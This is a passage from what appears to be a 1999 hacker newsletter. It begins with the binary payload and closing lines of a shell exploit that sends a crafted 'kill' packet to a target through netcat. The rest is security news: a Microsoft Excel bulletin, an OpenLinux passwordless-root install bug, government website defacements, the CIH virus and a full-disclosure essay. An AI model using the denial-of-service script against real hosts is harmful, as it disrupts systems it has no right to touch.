Cµ¶ïüÖʹçî³ÏÞçì½Ï>çÜE¢6‡â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§ „8ÂÓ'L5"ïé²±žá¤¸DRGÒIôlq„Y­g›»ÒiƒÆiÕ¾ëH¹H„w‹òá½²»Ô3ðlŽš*oÎ#ésC9m, _EOF_ echo "" echo "Sending kill..." cat ipp00p | nc $1 $2 echo "Done." rm -f ipp00p fi fi @HWA 18.0 Microsoft Security Advisory Bulletin: Excel 97 virus patch (MS99-14) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-014) -------------------------------------- Patch Available for Excel 97 Virus Warning Vulnerabilities Originally Posted: May 7, 1999 Summary ======= Microsoft has released a patch that eliminates vulnerabilities in the Excel 97 virus warning mechanism. The patch is fully supported, and Microsoft recommends that affected customers download and install it, if appropriate. Issue ===== Microsoft Excel 97 provides a feature that warns the user before launching an external file that could potentially contain a virus or other malicious software. This feature allows the user to weigh the risk of opening the file, based on its origin, the network it is located on and the security practices in operation there, the sensitivity of the data on the user's computer, and other factors. However, certain scenarios have been identified that could be misused to bypass the warning mechanism. In general, they require the use of infrequently-combined features and commands, and are unlikely to be encountered in normal use. This patch addresses these issues so that they cannot be taken advantage of by a malicious user. While there are no reports of customers being adversely affected by any of the vulnerabilities eliminated by the patch, Microsoft is proactively releasing the patch to allow customers to take appropriate action to protect themselves against it. These fixes are already built into Excel 2000 and users of that product will not need to download this patch. Affected Software Versions ========================== - Microsoft Excel 97 What Microsoft is Doing ======================= Microsoft has released patches that fix the problem identified. The patches are available for download from the sites listed below in What Customers Should Do. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q231304, Patch Available for Excel 97 Virus Warning Vulnerabilities, http://support.microsoft.com/support/kb/articles/q231/3/04.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) What Customers Should Do ======================== Microsoft highly recommends that customers evaluate the degree of risk that this vulnerability poses to their systems and determine whether to download and install the patch. The patch can be found at: - http://officeupdate.microsoft.com/downloaddetails/xl8p6pkg.htm More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-013, Patch Available for Excel 97 Virus Warning Vulnerabilities (the Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-013.asp. - Microsoft Knowledge Base (KB) article Q231304, Patch Available for Excel 97 Virus Warning Vulnerabilities, http://support.microsoft.com/support/kb/articles/q231/3/04.asp. Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Revisions ========= - May 7, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security -------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 19.0 LISA install leaves root access: Openlinux 2.2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ X-From_: linux-security-request@redhat.com Sun May 9 05:45:16 1999 Date: Sat, 8 May 1999 23:46:40 -0400 (EDT) From: Andrew McRory X-Sender: amacc@ns1.mailer.org To: linux-security@redhat.com cc: bugtraq@netspace.org Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-moderate: yes Subject: [linux-security] OpenLinux 2.2: LISA install leaves root access without password Hello, I believe I've found a bug in the installation process of OpenLinux 2.2 when using the LISA boot disk. During the installation a temporary passwd file is put on the new file system containing the user "help" set uid=0 gid=0 and no password. Once you are prompted to set the root password and default user password a new passwd and shadow file is created yet the help user is left in the shadow file with, you guessed it, no password... Here are the offending entries: /etc/passwd help:x:0:0:install help user:/:/bin/bash /etc/shadow help::10709:0:365:7:7:: Anyone who installed OpenLinux 2.2 using the LISA boot disk should check their password file now ;-) I found this using a cdrom I made from a mirror of the mirror at ftp.tux.org. Just to make sure I wasn't mixed up I redownloaded the install.144 file from ftp.calderasystems.com and tried again. Same thing. The install disk is version 137 dated 26Mar99 (displayed on the boot message). I wrote Caldera a message late in the day Friday regarding this bug but haven't heard back from anyone. I've tried to resist posting this until I hear back but I really feel people should know now!! PS: I'm not sure if Lizard, the graphical installation method, has this problem. It crashes before it does much here.... that's why I tried LISA. Thanks, Andrew McRory - amacc@linuxsys.com *********************************** Linux Systems Engineers / The PC Doctors * 3009-C West Tharpe Street - Tallahassee, FL 32303 * Voice 850.575.7213 *************************************************** -- ---------------------------------------------------------------------- Please refer to the information about this list as well as general information about Linux security at http://www.aoy.com/Linux/Security. ---------------------------------------------------------------------- To unsubscribe: mail -s unsubscribe linux-security-request@redhat.com < /dev/null @HWA 20.0 BUGTRAQ receives a plaque at SANS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Date: Mon, 10 May 1999 08:46:48 -0700 Reply-To: Aleph One Sender: Bugtraq List From: Aleph One Subject: Adminisrivia To: BUGTRAQ@netspace.org The SANS Institute (http://www.sans.org/) has graciously given Bugtraq a plaque during the SANS conference now happening at Baltimore for being one of the three most valuable security publications. This is in response to a survey the did at an earlier conference. I'd like to thank SANS for the gesture. Although I accepted the plaque it is really for all of you. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Approved-By: aleph1@UNDERGROUND.ORG Date: Mon, 10 May 1999 12:52:22 -0400 Reply-To: Brian Fisk Sender: Bugtraq List From: Brian Fisk Subject: Re: Adminisrivia To: BUGTRAQ@netspace.org In-Reply-To: <19990510084648.C29946@underground.org> I would also like to thank the SANS Institute on behalf of NetSpace, as they also donated a sizable chunk of money for a mail server upgrade as part of the same award. This donation, combined with other donations from the Bugtraq community in the past allowed us to double (or potentially even more) our mail delivery capacity for this list as well as all the others that NetSpace serves. Thanks to everyone here who makes this list what it is. Brian Fisk NetSpace Administrator On Mon, 10 May 1999, Aleph One wrote: > The SANS Institute (http://www.sans.org/) has graciously given Bugtraq > a plaque during the SANS conference now happening at Baltimore for being > one of the three most valuable security publications. This is in response > to a survey the did at an earlier conference. I'd like to thank SANS > for the gesture. Although I accepted the plaque it is really for all of > you. Cheers. > > -- > Aleph One / aleph1@underground.org > http://underground.org/ > KeyID 1024/948FD6B5 > Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 > -- Brian Fisk bfisk@netspace.org @HWA 21.0 White House takes server offline ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ White House Takes Server Offline contributed by Weld Pond In order to conduct an "Admistrative Review" the White House took its web server offline and also closed off all e-mail to and from the outside world. This comes after what HNN believes to be a successful crack of the www1. server at 8:50am EST Monday morning. This crack was _not_ related to other recent .gov/.mil cracks nor was this crack strongly related to the Chinese embassy bombing or had any other political motives. Other mainstream news outlets are getting their stories confused. (If you only read one of these articles I recommend the one by Brock Meeks of MSNBC, it seems to be the most thorough.) HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html MSNBC http://www.msnbc.com/news/268339.asp Heise.de http://www.heise.de/newsticker/data/fr-11.05.99-000/ ABC News http://www.abcnews.go.com/sections/tech/DailyNews/whhack990511.html C|Net http://www.news.com/News/Item/0,4,36431,00.html?st.ne.fd.mdh.ni CNN http://www.cnn.com/TECH/computing/9905/12/white.house.site.01/index.html Nando Times http://www.techserver.com/story/body/0,1634,47750-77011-550124-0,00.html MSNBC White House Web site shut down Purported attacker says there was no political motive By Brock N. Meeks and Alan Boyle MSNBC WASHINGTON, May 11 The White House shut down its public Web site for more than 24 hours because of computer attacks, a spokesman said Tuesday. Government Web sites have sustained a wave of assaults apparently aimed at protesting last week’s NATO bombing of the Chinese Embassy in Belgrade. However, in an interview with MSNBC, a computer user who claimed a role in the White House Web break-in denied that there was a political motive. AN ATTEMPT was made to break into the system that operates the Web page yesterday morning, White House spokesman Barry Toiv told MSNBC Tuesday, and so what we’ve done is use existing procedures to limit access to the system so we could make a full assessment.The Web site was back in operation by Wednesday morning. Computer attacks on government Web sites have taken on a higher profile in the wake of Friday’s embassy bombing, which left three dead and 20 injured. The bombing, which NATO said was due to an intelligence error, sparked a wave of demonstrations at the U.S. Embassy in Beijing, as well as widespread criticism online and offline. A variety of federal sites have been defaced by political protesters. But the primary motivation behind the attack on the White House site was merely to show that it could be done, a teen-ager who said he was involved in the attack told MSNBC. A telephone conversation with the 18-year-old was arranged by a mutually trusted intermediary. The teen, who claimed to be a member of the group known as gH or Global Hell, spoke on the condition that neither his real name nor his hacker nickname would be published. To back up his claim, he provided internal user logs listing White House staff. His account also was consistent with other reports provided by trusted third parties. `JUST LUCK’ The teen said the White House Web break-in was actually just luck. Members of gH caught the White House system administrator transferring log files in an insecure manner via an unsecured FTP site that was snooped out from another box (computer), he told MSNBC. I have no idea why they would do that Whoever that admin was, he didn’t know what he was doing, he said. Along with gH, a group calling itself the Hong Kong Danger Duo took part in the White House hack, the teen said. He said the White House hack lasted for only a few minutes, due to what is known as a crontab, a timed command set by the system administrator. This command automatically refreshes the entire site with identical content from a secure server to help guard against the kind of attack that took place Monday. OTHER DEPARTMENTS HIT Government sources told NBC News that attackers also hit the Web servers for the departments of Energy, Interior and Labor, as well as the U.S. Information Agency’s Web site. All those Web sites were in service Tuesday afternoon, although traffic to the Energy Department’s Web site was redirected to a numerical Internet address. The sources said the intruders left behind cyber-graffiti slogans saying, for example, You bombed the Chinese Embassy, this is what you’re going to get. Some of the graffiti was in Chinese characters, the sources said. In all cases, the Web computer servers contained only publicly available information, and no classified information was compromised, officials emphasized. The politically motivated attacks on departmental Web sites appear to be unrelated to the White House attacks. The teen from gH said he had no idea who carried out the other computer attacks, an assertion that meshed with other reports. Several hacker-oriented sites including AntiOnline as well as Hacker News Network and Attrition.Org posted what they said were copies of the White House hack. A message hidden inside the source code for the page reads: You found my elite hidden source. Wow. Ok, no real msg here. Stop all the war, no point for it. This box wasn’t ever secure. Brian Martin, who runs the Attrition.Org site, said the stop all the war reference doesn’t mean the attack was launched with politics in mind.A lot of hackers will do that to kind of justify what they are doing, Martin said. They hacked this site because they could, he said. They saw a window of opportunity and took it. The White House site is operated under contract by PSINet of Herndon, Va. NBC News correspondent Jim Miklaszewski and MSNBC’s Bob Sullivan contributed to this report. @HWA 22.0 Feds to install IDS ~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Feds Look to Install IDS contributed by erewhon The GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National Infrastructure Protection Center (jeeez, think they enough people working on this?) are working on a Federal Intrusion Detection Network (FIDNET) which will provide a common center for response to cyber attacks on agencies. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0510/web-fidnet-5-11-99.html MAY 11, 1999 . . . 18:10 EDT Agencies lay groundwork for intrusion-detection network BY DIANE FRANK (dfrank@fcw.com) A group of federal agencies has completed the initial model of a governmentwide intrusion-detection network that will provide a common center for response to cyberattacks on agencies. The Federal Intrusion Detection Network (FIDNET) is in the very early stages of development, and the group of federal agencies heading the development effort recently agreed on possible agency responsibilities and a reporting structure, said Tom Burke, assistant commissioner of information security at the General Services Administration's Federal Technology Service, today at the Outlook 2000 conference in Falls Church, Va. GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National Infrastructure Protection Center are all developing FIDNET as part of President Clinton's directive to protect the nation's mission-critical systems. The system is intended to provide all agencies with intrusion-detection systems that will allow agencies to locate incidents across the government as soon as they occur. It also will serve as a center for analysis of intrusions or attacks. The system will be made of three main blocks, with the civilian agencies reporting to the Defense and intelligence agencies and possibly a full-time program management office overseeing the whole system. FIDNET is based on the Defense Department's incident-reporting network, which is much further along than the efforts in the civilian agencies. "We're looking to leverage the work that has already been done at Air Force and DOD so we don't duplicate their effort," Burke said. The blocks eventually will include a similar network being developed in the private sector and the Federal Computer Incident Response Capability center at GSA, Burke said. @HWA 23.0 CIH Damages climb in China ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ 360,000 Systems Damaged in China Contributed by DongWong A survey released earlier this month indicate that at least 360,000 systems where damaged by the CIH or Chernobyl virus. The damage was estimated at Rmb1 million (US$120 million). The survey was conducted by Beijing Rising Computer Science and Technology Development Co., Ltd., a Chinese anti virus company. Asia BizTech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/57681 24.0 Company claims damages in web page defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Company Claims Damages From Attack contributed by War3z Dud3 An Issaquah, Washington high-tech company is claiming thousands of dollars worth of damage after it had it web page defaced. The defaced page was a protest of NATOs bombing of the Chinese Embassy in Belgrade. The FBI is investigating and have claimed to have tracked the attackers to New York, one in Massachusetts, and another in St. Louis. Yahoo Daily News http://dailynews.yahoo.com/headlines/local/state/washington/story.html?s=v/rs/19990510/wa/index_2.html#2 Internet Company Hit By Hackers - (ISSAQUAH) -- An Issaquah high-tech company is dealing with thousands of dollars in damage, thanks to the Chinese embassy bombing in Belgrade. Michael Renz at webcityusa-dot- com went online last night to update his websites for a dozen local businesses. That's when he realized someone had destroyed them. In their place, the hackers had placed graphic pictures of embassy bombing victims and hate messages blasting the U-S and NATO. Authorities, including the FBI, are investigating and have reportedly traced the action to three different university websites: one in New York, one in Massachusetts, and another in St. Louis. @HWA 25.0 Three .gov sites hacked ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Three Gov Servers Cracked in Protest of Embassy Bombing contributed by Space Rogue The Department of Energy, The Department of the Interior, and the National Park Service all had their web sites defaced in protest of the NATO bombing of the Chinese Embassy in Yugoslavia. The defaced pages included pictures of the people killed in the bombing. ABC News http://abcnews.go.com/sections/world/DailyNews/kosovo_chinacyber_990509.html Australian Broadcasting Corporation http://www.abc.net.au/news/newslink/weekly/newsnat-11may1999-2.htm C|Net http://www.news.com/News/Item/0,4,36311,00.html?owv CNN http://www.cnn.com/TECH/computing/9905/10/hack.attack.02/index.html Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0510/web-nato-5-10-99.html ITN http://www.itn.co.uk/World/world19990510/051005w.htm Federal Computer Week; MAY 10, 1999 . . . 14:25 EDT Hackers retaliate after NATO bombing BY BRAD BASS (brad_bass@fcw.com) A group of Chinese hackers defaced the home pages of the departments of Energy and Interior this past weekend, apparently in retaliation for NATO's accidental bombing of the Chinese embassy in Belgrade. The hackers claimed their motives were not political but were a response to the death of Chinese journalists resulting from NATO's attack. The messages were written in Chinese and English. The hackers referred to the bombing as a "Nazi action" and urged NATO, and specifically the United States, to accept responsibility. "You have owed [sic] Chinese people a bloody debt which you must pay for," said a message on the DOE Web site on Sunday afternoon. "We won't stop attacking until the war stops!" A spokesman for iDefense, an information clearinghouse on critical infrastructure protection, said the attack probably did little harm but characterized it as "a warning sign" to the government. "It's just another sign that these types of things are easy to accomplish if you have a modem and a little technical knowledge," the spokesman said. "It's not too far removed from taking it to another more harmful level." -=- C|Net; Chinese attack embassy bombing on Net By Reuters Special to CNET News.com May 10, 1999, 8:15 a.m. PT URL: http://www.news.com/News/Item/0,4,36311,00.html BEIJING--Chinese computer buffs flooded cyberspace with anti-U.S. rhetoric today, hacking into a U.S. embassy Web site and overloading chat rooms with condemnation of the NATO bombing in Yugoslavia. As angry protesters hit the pavement in a more traditional form of outrage, hurling whatever came to hand at the U.S. and British embassies in Beijing, China's wired elite logged on to vent their anger. More than 24,000 protest messages have been posted on one popular chatroom at Netease.com since three NATO missiles slammed into the Chinese embassy compound in Belgrade Friday night, killing three journalists and injuring more than 20 people. Most of the postings were one-line invectives against President Clinton or the NATO bombing campaign in Yugoslavia. But others focused on ways to retaliate for the strike. "Our strongest weapon is for the masses to begin a campaign to boycott American goods," wrote one user. "This is what the Americans are most scared of.Americans love money and they listen the most to taxpayers. If they lose economic gains then they lose the essentials." Another user, writing under the name "KILL-USA," called on China to make use of the situation to push for entry into the World Trade Organization. One urged his counterparts to pirate U.S. software to cripple the American economy. Others condemned students and workers who had attacked foreign journalists covering violent protests outside the U.S. embassy over the weekend. "The anger in our hearts must not lead us to lose reason and curse and beat foreigners when we see them," wrote a user called Chinese Kung Fu. The outpouring of angst on the Web was so great that many of China's most popular sites added additional servers to keep up with the demand. The popular Sohu.com also set up a special site to gather responses to the attack on the Chinese embassy and was receiving one response every second earlier today. In addition to the Web postings, Chinese hackers twice assailed the U.S. embassy Web site, replacing the home page with text reading "down with barbarians," the state-run China Daily reported. Today the Web site could be accessed through an American server, but the Chinese route was blocked. Word of the bombing spread rapidly on the Internet--in contrast to the many hours the official media took to report it--and many students said they first heard about street protests in Beijing on the Web. More than 2 million Chinese use the Internet, one of the only forums of expression free from government oversight. Story Copyright © 1999 Reuters Limited. All rights reserved. @HWA 26.0 Full Disclosure, the only way to go. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Full Disclosure - The Only Way to Be Sure contributed by remage A rather interesting rant has been posted by L0pht Heavy Industries, Inc. The rant covers the issue of Full Disclosure which has been argued about and argued about. In the wake of the recent showcode-Webtrends-L0pht-Microsoft advisory the L0pht makes a very convincing argument that Full Disclosure is the only way to protect those who are vulnerable. L0pht Heavy Industries, Inc. http://www.l0pht.com/ 05.10.1999 There is a new trend in the reporting of security vulnerabilities these days. Many of the problems are being reported by companies that make products to detect these problems. While more people researching the security of products is a good thing, it is certainly having an effect on the free flow of security information. Sometimes this effect is to the detriment of the customers of the product that the flaw exists in. If a company makes a product that scans for security problems, they are going to want to add their newly discovered vulnerability to their list of things to scan for. They are probably, depending on the seriousness of the problem they have uncovered, going to want to make the advisory of the problem into a full scale press release that will hype their product. Usually the press release won't really tell you how to find the problem or how to solve it. You are going to need to download their product for that. When security problems exist on production servers accessible from the internet, time is critical. Every day that goes by is another day that the server is exposed. How many people know about the problem? Who is actively exploiting it? It is impossible to tell. Good ethical security practice is to tell the people effected quickly, especially if there are steps they can take to mitigate or eliminate the risk themselves. The L0pht recently found a problem with Microsoft's IIS 4.0 web server, the showcode problem. It allowed web users to read files anywhere on the web server that the file permissions were set to be world-readable. This turns out to be the case in many web servers that are not locked down properly. The L0pht was surprised at how widespread the problem was. Many high profile e-commerce servers were effected. Many, many corporate web servers were effected. The research of the problem, which took less than a day, came up with a simple solution. Delete the sample files which made the machine vulnerable. They don't need to be on production servers anyway. We crafted an advisory and gave out the solution. When we reported this to Microsoft they said that they had known about the problem for "several weeks". They had been notified by WebTrends about the problem, were researching it, and would issue a Security Bulletin. It didn't seem to be that so complicated an issue that would take several weeks to research. And the fix was simple. Just delete the files. No need to download a hotfix or even tweak the registry. What was taking so long? The L0pht released the showcode advisory to Bugtraq, computer industry reporters, and Microsoft on May 7, 1999, 9:30am EST. Later that day, approximately 1:40 pm EST, WebTrends released a press release about the same problem. It spoke of how WebTrends had discovered the problem. The WebTrends press release didn't tell how to detect the problem and had no solution to the problem. Two things that were present in the L0pht advisory. It seemed that you had to download and run their product if you wanted this information. It makes one wonder if the press release was put out at that particular time because the L0pht had informed the public about the problem first. It makes one wonder why Microsoft kept this problem and easy solution to themselves for several weeks. Many crackers keep security vulnerabilities secret so that they can exploit them without worrying about vendor patches or fixes by system administrators. This is looked down upon highly by the security community as totally unethical. Why keep the vulnerabilities secret unless you are going to exploit them, or perhaps trade them for something? Now we have software vendors keeping things secret. At least secret for a substantial period of time. Is this the way we want the industry to behave? This is why full disclosure mailing lists such as Bugtraq and web sites such as Packet Storm Security are so important. They allow customers to get vulnerability reports, and hopefully fixes, in a timely manner. There is no centralized clearinghouse such as the software vendor or some government agency to slow things up for their own ends. Vulnerability information is extremely valuable both to attackers and customers. Companies and organizations that release this information openly and as soon as possible are doing the security community a service. Those who choose to use the information for their own purposes first put customers at risk. @HWA 27.0 NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NIPC releases CyberNotes contributed by Simple Nomad The National Infrastructure Protection Center (NIPC), which is essentially being run by the FBI, has released online copies of "CyberNotes", the newsletter whose mission is to "support security and information system professionals with timely information on cyber vulnerabilities, hacker exploit scripts, hacker trends, virus information, and other critical infrastructure-related best practices". It reads like a government version of numerous hacker web sites. Our tax dollars at work. NIPC Cyber Notes http://www.nipc.gov/nipc/nipcpublic.htm Oh, and if you have never visited the NIPC web site it is good for a laugh or two. National Infrastructure Protection Center http://www.nipc.gov/ @HWA 28.0 Cure for CIH ~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Cure for CIH Found contributed by Scores A student in Bangladesh claims to have found a cure for the CIH or Chernobyl virus that wipes out thousands of systems world wide last month. Monirul Islam Sharif, an undergraduate computer science student claims that a 70K-byte C language program he has named MRECOVER will recover the FAT table and the first partition of a FAT16 table. Computer World http://www.computerworld.com/home/news.nsf/all/9905101cih MRECOVER http://members.xoom.com/monirdomain Student touts 'Chernobyl' cure By Sanjit Singh NEW DELHI -- One student invented it, but another has written an antidote to help users who lost data to the CIH computer virus. The Chernobyl virus, also known as CIH, was invented by onetime Taiwanese student Chen Ing-hau and caused havoc all over Asia April 26, infecting thousands of PCs in South Korea, Singapore, India, Bangladesh and China. (Most major U.S. corporations with updated antivirus software escaped serious damage.) But it now has a cure, courtesy of Monirul Islam Sharif, an undergraduate computer science student at Dhaka University in Bangladesh. Sharif, 21, said he wrote the 70K-byte C language program, which he called MRECOVER, in 24 hours. "I started working on it on April 27, when a friend brought his infected hard drive to me, and by the next day, it worked when I tried it out. Most of the data on the disk was recovered," he said. Sharif tried it on several other computers at Dhaka, and it worked there, too, recovering data in minutes. "If your machine uses FAT [File Allocation Table], MRECOVER will recover all the data on the disk within three to four minutes. But if your computer uses FAT 16, then it will recover all data after the first partition, limiting the recovery to between 40 and 60 percent," Sharif said. He added that the antidote doesn't work on hard drives with a capacity of 8G bytes or more. The program is free to use and has been posted on the Web at http://members.xoom.com/monirdomain for anybody who wants to download it. A new and improved version for machines that use FAT 16 will be ready within days and followed by one for large-capacity hard drives. Sharif said he has received 3,000 hits and innumerable e-mail messages since he put MRECOVER on the Internet May 5, but the inventor doesn't see any commercial gain from the program. Sharif, who was born in England and spent his early childhood there, graduates next June. He said his ambition is to head to the U.S. for higher studies. "I would like to go to the U.S. to do a master's in computer science. But it's unlikely that I will specialize in antivirus programs. I still find general programming much more interesting," he said. @HWA 29.0 Anonymous web browsing from 303.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Anonymous Web Surfing Contributed by Netmask 303.org is now offering anonymous web surfing. By setting your browser to use 303.org as the http proxy server, and port 1050. This server will forward the type of client you use, but not the IP address. More info available at 303.org http://www.303.org @HWA 30.0 Yugoslavia Offline? ~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ YUGOSLAVIA OFFLINE by BHZ, Wednesday 12th May 1999 on 9:30 pm CET It looks like Yugoslavia's Internet users will be offline for a long time. As stated on www.beograd.com "We have reliable information that the US Government ordered shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO air war against this country. This action might be taken as soon as later tonight or tomorrow (May 12 or 13, 1999)". Press release below. May 12, 1999 US shuts down Yugoslav Internet - For immediate release BELGRADE, MAY 12 - We have reliable information that the US Government ordered shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO air war against this country. This action might be taken as soon as later tonight or tomorrow (May 12 or 13, 1999). This is a flagrant violation of commercial contracts with Yugoslav ISPs, as well as an attack on freedom of the Internet. A Web site in protest of these actions should be up shortly. We will supply you with the URL. In the meantime, please be so kind to inform as many people as possible about this tragic event for the Internet community in Yugoslavia and Europe. BeoNET Belgrade, Yugoslavia May 13th Contributed by cyberdiva From Beograd.com: 16:50 According to the last information, "LORAL ORION" has given up, until further notice, disconnecting Yugoslavia from Internet, because of the protests from all around the world that followed the announcement 15:55 FONET - One of the biggest US communication satellites of the firm "LORAL ORION" has informed Belgrade provider "Informatika" last night that because of "vis major" they wiould have to stop Internet emitting toward all Yugoslav providers who are linked to providers in USA. "This decision is the result of the executive order of the President of USA, Bill Clinton, banning emitting of all services from USA into Federal Republic of Yugoslavia (Serbia and Monte Negro)", says the message of "LORAL ORION" to the general Director of "Informatika", Slobodan Sreckovic. "In accordance with that, LORAL ORION will, starting from May 12, 1999, stop its services", it is said at the end of the statement. On Thursday, May 13, in morning hours, "Informatika" confirmed to Fonet this has not happened yet, but they are expecting to be disconnected from USA Internet satellite service toward Yugoslavia any minute/hour now". --diva May 14th RE: Internet connection in Yugoslavia Now the mainstream media has picked it up and although Loral for the time has relented, it looks like the Clinton administration is still considering it. Clinton Deciding Whether to Cut Yugoslavia Internet Access I don't have to remind you there has been no formal declaration of WAR by the United States. It makes me wonder how are private companies going to be able to secure global business if underneath it all, they are forced to do the political bidding of the United States against their own customers... Hacker News Network is doing an expose on the story going up today as well. Thanks for hearing me out... --diva FoxNews; Clinton Deciding Whether to Cut Yugoslavia Internet Access 8.08 a.m. ET (1208 GMT) May 14, 1999 WASHINGTON Confronted with a dilemma of war in the information age, the Clinton administration is trying to decide whether its trade embargo extends to Internet access for some of Yugoslavia's citizens. Loral Space and Communications Ltd. of New York said it may be forced to cut transmissions into Yugoslavia from one of its satellites, which serves at least two of the country's major Internet providers. "We're still not clear on this whole thing," said Jeannette Colnan, a spokeswoman for Loral Space. President Clinton issued an executive order two weeks ago banning U.S. companies from selling or supplying to Yugoslavia "any goods, software, technology or services," although the order allows for the "special consideration of the humanitarian needs of refugees." The National Security Council said information services are generally considered exempt from trade embargoes, but that electronic commerce is affected. The Internet performs both functions. "We'll need to inquire further about the appropriate applications of the law," said David Leavy, a spokesman for the security council. Loral Space said Thursday that it was discussing its obligations under the embargo with the Treasury Department, which didn't respond to requests for comment. Experts said any move by the United States to limit civilian use of the Internet would be unprecedented. NATO has already attacked Serbian broadcast stations to stem what it describes as propaganda, and Serbs have established an extraordinary network on the Internet criticizing ongoing air strikes. But the Internet also serves as a conduit for civilians to receive unadulterated news reports about NATO efforts. "The Internet remains at this point one of the major sources inside Yugoslavia for objective news reporting about the war," said Jim Dempsey of the Washington-based Center for Democracy and Technology. Word of the threat to shut down Internet access to at least parts of Yugoslavia spread quickly across the global network, where it was condemned in some e-mail messages and online discussion groups. "To put it bluntly, we somehow got used to air-raid sirens, bombings and threats of invasion, but we don't know how we're going to survive without the Internet," said Alex Krstanovic, co-founder of Beonet, one of the Internet providers in Yugoslavia. But some argued that access should be cut off. "Continuing to provide these services would be kind of like giving aid to the enemy," one person wrote. The possible loss of Internet access also illustrated the fragility of the computer network and the importance assigned to it internationally. Computer traffic in Yugoslavia uses both satellite and traditional land-based telephone lines, but the loss of the Loral satellite could dramatically reduce the Internet bandwidth available to citizens there, causing slow connections or even blackouts. Web sites reliant on the Loral satellite continued to be accessible overnight Thursday, and there were no substantiated reports of anyone unable to retrieve information from outside the country using the Internet. A spokeswoman at the organization that registers Web addresses ending with the country's "yu" suffix said that she was familiar with the reports but that there had been no problems yet. @HWA 31.0 Spam Recycling site deals with spammers for you ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Who75 http://www.maximumpcmag.com/inside_sources/99.5/99.5.11.phtml Site Offers To ''Recycle'' Spam If you feel guilty about tossing an aluminum can in the garbage, spamrecycle.com may be the site for you. The site is offering to "recycle" spam you send the site and submit it for complaint to the proper authorities. Although it may sound like a shell company spam artists use to farm more e-mail accounts, spamrecycle.com is supported by the Coalition Against Unsolicited Commercial E-mail. Spamrecycle.com officials said the site was created to help people fight spam. Many spam perpetrators give e-mail addresses that offer to remove the spam victim from further unsolicated email. Unfortunately, in many cases, the e-mail only validates the victim's e-mail address, causing more spam to pour in. Spamrecycle.com is sponsored by CDnow.com, which is giving people who recycle their spam a $5 